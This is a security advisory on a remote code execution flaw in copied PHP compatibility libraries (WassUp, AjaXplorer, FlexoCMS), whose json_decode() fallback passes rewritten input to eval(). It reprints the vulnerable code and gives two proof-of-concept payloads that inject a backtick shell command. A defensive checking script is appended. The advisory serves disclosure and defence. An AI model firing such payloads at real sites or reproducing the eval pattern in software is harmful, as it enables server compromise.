PHP Library Remote Code Execution

01 Jul 2022. Reported by Eldar Marcussen. Type: packetstorm. Source: packetstormsecurity.com

PHP library RCE in the json_decode function; the vulnerable code is shared across compatibility libraries.

JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function
===============================================================================
Several PHP compatibility libraries contain a potential remote code execution
flaw in their `json_decode()` function, the result of having copy-pasted
existing vulnerable code.
  
  
Identifiers  
---------------------------------------  
* JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txt  
  
  
Affected components  
---------------------------------------  
* WassUp Realtime analytics wordpress plugin/compat library -  
https://wordpress.org/plugins/wassup/  
* AjaXplorer Core -  
https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released  
* FlexoCMS - https://github.com/flexocms/flexo1.source  
* Various code -  
https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code  
* compat_functions.php - http://techfromhel.com  
  
  
Description  
---------------------------------------  
This appears to date back to a compatibility library published in 2010 and
appears in several code bases, with no or only a few variations.

The vulnerable code generally shares the following characteristics:
* The json_decode function is declared if it does not already exist
* some str_replace calls transform the JSON representation into PHP syntax
* eval($out)
  
Since `eval()` is Turing complete, it is generally considered unsafe to use it
on user-controlled or user-influenced data; however, it is unclear whether
practical exploitation would be possible, due to the likely presence of an
existing json_decode function.
  
```php
/**
 * compat_functions.php
 * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
 * backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
 * @author: Helene D. <http://techfromhel.com>
 * @version: 0.3 - 2010-09-13
 * @since Wassup 1.8
 */

/**
 * Convert simple JSON data into a PHP object (default) or associative
 * array. Emulates 'json_decode' function from PHP 5.2+
 * @author: Helene Duncker <http://techfromhel.com>
 * @param string,boolean
 * @return (array or object)
 */
if (!function_exists('json_decode')) {
    function json_decode($json, $to_array = false) {
        $x = false;
        if (!empty($json) && strpos($json, '{"') !== false) {
            // JSON is rewritten into PHP array syntax by plain string replacement
            // and then handed to eval(): any ')' or '`' in the input escapes
            // the array literal and becomes PHP code.
            $out = '$x=' . str_replace(array('{', '":', '}'), array('array(', '"=>', ')'), $json);
            eval($out . ';');
            if (!$to_array) $x = (object) $x;
        }
        return $x;
    } //end function json_decode
}
```
  
  
Proof of Concept  
---------------------------------------  
The eval can be exploited in a number of ways, via either full or partial
control of the json string:
```php  
/* Payload  
`id`;//{"  
*/  
json_decode('`id`;//{"');  
```  
or partially controlled content:  
```php  
/* Payload  
{"key":"value");echo `id`;//"}  
*/  
json_decode('{"key":"value");echo `id`;//"}');
```
  
Credit  
---------------------------------------  
Eldar "Wireghoul" Marcussen  
  
  
Solution  
---------------------------------------  
Ensure json_decode is present as a native function for your PHP installation.
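As an added example, not code from the advisory or from any of the affected projects, the following PHP script shows two checks a defender can run against this issue: a runtime assertion that the `json_decode` actually in use is the engine's own implementation (the remedy above), and a source scanner for the pattern listed under Description (a `function_exists('json_decode')` guard whose block reaches `eval()`), so copied compat libraries can be located before they are ever loaded on a host that lacks the json extension. The function names, the regular expressions and the sample source strings are this example's own; it assumes PHP 7 or later with the Reflection extension.

```php
<?php
// Added example, not code from the advisory or the affected projects.
// Assumes PHP >= 7 with the Reflection extension. Both helper names below
// are hypothetical and chosen for this example.

/**
 * Check 1 (the advisory's Solution): is json_decode() the engine's own
 * implementation, or a userland function declared by a compat library?
 */
function json_decode_is_native(): bool
{
    if (!function_exists('json_decode')) {
        return false;
    }
    $rf = new ReflectionFunction('json_decode');
    // Built-in functions report isInternal() === true; a copy/pasted
    // compat declaration is user-defined and reports false.
    return $rf->isInternal();
}

/**
 * Check 2 (the pattern under Description): scan PHP source text for an
 * `if (!function_exists('json_decode'))` guard whose block contains eval().
 * Returns the 1-based line numbers of eval() calls inside such a guard.
 * This is a line-based heuristic, not a PHP parser: it strips simple quoted
 * strings, tracks brace depth from the guard line, and stops when the
 * guard's block closes.
 */
function find_eval_json_decode(string $source): array
{
    $guardRe  = '/!\s*function_exists\s*\(\s*[\'"]json_decode[\'"]\s*\)/';
    $stringRe = '/\'[^\']*\'|"[^"]*"/';   // simple literals only, no escapes
    $findings = [];
    $inGuard  = false;
    $depth    = 0;

    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (!$inGuard) {
            if (!preg_match($guardRe, $line)) {
                continue;
            }
            $inGuard = true;
            $depth   = 0;
        }
        // Braces inside string literals (e.g. '{"') must not affect depth.
        $code   = preg_replace($stringRe, '', $line);
        $depth += substr_count($code, '{') - substr_count($code, '}');
        if (preg_match('/\beval\s*\(/', $code)) {
            $findings[] = $i + 1;
        }
        // The guard block is closed once depth returns to zero on a line
        // that actually contains a closing brace.
        if ($depth <= 0 && strpos($code, '}') !== false) {
            $inGuard = false;
        }
    }
    return $findings;
}

// Constructed sample input with the shape of the vulnerable compat library
// (a string literal only; nothing in it is executed).
$sample = <<<'PHP'
<?php
if (!function_exists('json_decode')) {
    function json_decode($json, $to_array = false) {
        $x = false;
        if (!empty($json) && strpos($json, '{"') !== false) {
            $out = '$x=' . str_replace(array('{', '":', '}'), array('array(', '"=>', ')'), $json);
            eval($out . ';');
        }
        return $x;
    }
}
PHP;

// Constructed benign file for comparison: the same guard, but it refuses to
// run instead of emulating json_decode() with eval().
$benign = <<<'PHP'
<?php
if (!function_exists('json_decode')) {
    trigger_error('json extension missing', E_USER_ERROR);
}
PHP;

printf("json_decode is native here: %s\n", json_decode_is_native() ? 'yes' : 'no');
printf("eval inside json_decode guard (sample): line(s) %s\n",
    implode(', ', find_eval_json_decode($sample)) ?: 'none');
printf("eval inside json_decode guard (benign): line(s) %s\n",
    implode(', ', find_eval_json_decode($benign)) ?: 'none');
```

On any PHP build that bundles the json extension the first check passes and the userland copy is never declared, because the `function_exists` guard skips it; the scanner is the useful part there, since the dead copy still ships with the code base and becomes live the moment the extension is absent. Running `json_decode_is_native()` early in application bootstrap and refusing to start when it returns false is a direct implementation of the advisory's Solution.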
  
